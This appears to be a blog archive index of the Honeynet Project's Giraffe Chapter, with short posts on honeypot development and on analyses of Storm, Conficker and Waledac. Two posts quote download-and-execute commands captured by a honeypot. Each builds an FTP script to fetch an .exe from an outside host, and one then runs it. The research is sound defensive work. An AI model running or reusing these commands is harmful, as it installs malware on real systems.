Giraffe Chapter

HoneyMap - Visualizing Worldwide Attacks in Real-Time

mark.schloesser — Mon, 01 Oct 2012 09:51:45 -0500

The HoneyMap shows a real-time visualization of attacks against the Honeynet Project's sensors deployed around the world. It leverages the internal data sharing protocol hpfeeds as its data source. Read this post to learn about the technical details and frequently asked questions. Before going into explanations, take a look at the map itself: map.honeynet.org!

Giraffe Chapter

Giraffe Chapter - Status Report 2009/2010

tillmann.werner — Fri, 01 Jul 2011 07:40:23 -0500

The Giraffe Chapter's continuous goal is to develop and improve honeypot technology and related tools and to conduct in-depth analysis of new attack techniques and malware specimens. This report lists our main activities and contributions from the last two and a half years.

_________________________________________________________________________________
ORGANIZATION

Much to our regret, two of the founding members of our chapter have decided to terminate their Honeynet Project membership and are thus officially moved to alumni status. We respect this step and are grateful for an adventurous journey and their numerous contributions over the years. We will continue to work closely together with our friends, and want them to know that they can rejoin the team whenever they wish to.

The Giraffe Chapter consists of the following people:

Felix Leder
Mark Schlösser
Tillmann Werner
Georg Wicherski

Giraffe Chapter

A Breeze of Storm

felix.leder — Tue, 27 Apr 2010 19:05:23 -0500

Today, Steven Adair from Shadowserver imformed us about a new piece of malware that looks like a new version of the infamous Storm Worm. Storm was one of the first serious peer-to-peer botnets, it was sending out spam for more than two years until its decline in late 2008. Mark Schloesser, Tillmann Werner, Georg Wicherski, and I did some work on how to take down Storm back then, so the rumors about a new version caught our interest.

Giraffe Chapter

Dissecting the SotM Attack Trace Pcap

tillmann.werner — Fri, 19 Feb 2010 08:13:35 -0600

Hi everybody,

our first Scan of the Month Challenge in 2010 is over! We received 91 submissions in total, and some parts of the solutions are so interesting that I would like to publicly highlight them in this post. Now that the winners are announced (Congratulations Ivan, Franck, and Tareq!), I think I also owe you an explanation why we asked the specific questions and what we expected as answers. I am sure you will be surprised how many pieces of information you can dig up in a plain pcap - I was indeed when I had a look at the solutions we received. Enjoy!

Giraffe Chapter

RE-Google in action - screenshot

felix.leder — Sun, 15 Nov 2009 16:49:33 -0600

Giraffe Chapter

RE-Google - or how Grandma started Reverse Engineering

felix.leder — Sun, 15 Nov 2009 16:20:07 -0600

Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

Giraffe Chapter

Iteolih: RPC vulnerability implementation party

mark.schloesser — Tue, 25 Aug 2009 11:33:00 -0500

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Giraffe Chapter

Iteolih: Miles and More

markus.koetter — Tue, 11 Aug 2009 07:10:33 -0500

We got a new milestone due:
10.08.2009

thread-pool works
stream recording works
shellcode detection using libemu works
shellcode emulation using libemu works
compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: malicious ftp services

markus.koetter — Sun, 26 Jul 2009 08:28:13 -0500

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: If you can't touch it ...

markus.koetter — Tue, 21 Jul 2009 08:17:48 -0500

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: SMB/RPC efforts

mark.schloesser — Sat, 11 Jul 2009 10:23:49 -0500

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Giraffe Chapter

Conficker.A going down?

tillmann.werner — Fri, 10 Jul 2009 16:51:17 -0500

Conficker contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.

Giraffe Chapter

nebula - Client library and revised signature segment selection

tillmann.werner — Mon, 08 Jun 2009 03:58:59 -0500

One project mentored by the Honeynet Project during GSoC aims at improving nebula, an automated intrusion signature generator. There are two critical components in the signature generator: A clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.

Giraffe Chapter

Iteolih: Is this worth your time?

markus.koetter — Fri, 05 Jun 2009 17:37:36 -0500

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: Python Benchmark

markus.koetter — Sun, 24 May 2009 11:57:02 -0500

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

Giraffe Chapter

A view on Conficker's inside

felix.leder — Fri, 24 Apr 2009 11:47:20 -0500

Many people have asked us, how Conficker looks like. That's a tough question for something that's hidden and tries to be as stealthy as possible. The last time somebody asked me: "Can you show me Conficker?", I decided to visualize Conficker. Here is a little video that shows the evil core of Conficker.C.

Giraffe Chapter

Speaking Waledac

felix.leder — Tue, 27 Jan 2009 15:33:50 -0600

While it seems to be impossible to say whether waledac is the successor of storm or not, what we can do is take a look at the traffic encryption. They guys over at Shadowserver have already blogged some details about this. We at the Giraffe Chapter investigated waledac's communication protocol further. Here are our results.

Giraffe Chapter

Giraffe Chapter - Status Report 2008

markus.koetter — Sat, 03 Jan 2009 21:22:38 -0600

ORGANIZATION
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:

Paul Bächer
Markus Kötter
Felix Leder
Mark Schlösser
Tillmann Werner
Georg Wicherski

DEPLOYMENTS

Giraffe Chapter

Waledac is wishing merry christmas

felix.leder — Fri, 02 Jan 2009 01:16:19 -0600

Waledac is wishing merry christmas
There is a new bot in town. It's called Waledac. The way it is spreading reminds a lot of people of the good old storm botnet: An email is sent containing a "christmas card" in form of the executable "postcard.exe".

A preliminary view on the binary has been given by the Shadowserver guys (Steve Adair).

I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down some of my few findings to let the hunt begin.

Giraffe Chapter

ipv6 local-link scope is a mess

markus.koetter — Mon, 20 Oct 2008 11:30:22 -0500

I've been looking on ipv6 lately, and even though I got a global /64 for free from he.net, I'm not that amused about ipv6 yet.

Giraffe Chapter

No more emulation!

tillmann.werner — Wed, 27 Aug 2008 15:05:09 -0500

Emulation is an important technology in honeypots and honeynets. It's not always what we want, though, and here's why. As you might know, most bots perform attacks in multiple stages, i.e., they

send some exploit code to the victim that opens a shell,
connect to that shell or let the shell connect back,
invoke commands to download the actual malware binary,
execute the malware.

Catching the exploit and providing a fake shell isn't too hard, as shown in this post. But we certainly don't want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.

Giraffe Chapter

About The Honeynet Project

drupal — Sun, 10 Aug 2008 19:54:48 -0500

The Honeynet Project is a leading international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security. With Chapters around the world, our volunteers have contributed to fight again malware (such as Confickr), discovering new attacks and creating security tools used by businesses and government agencies all over the world.

Alaskan Chapter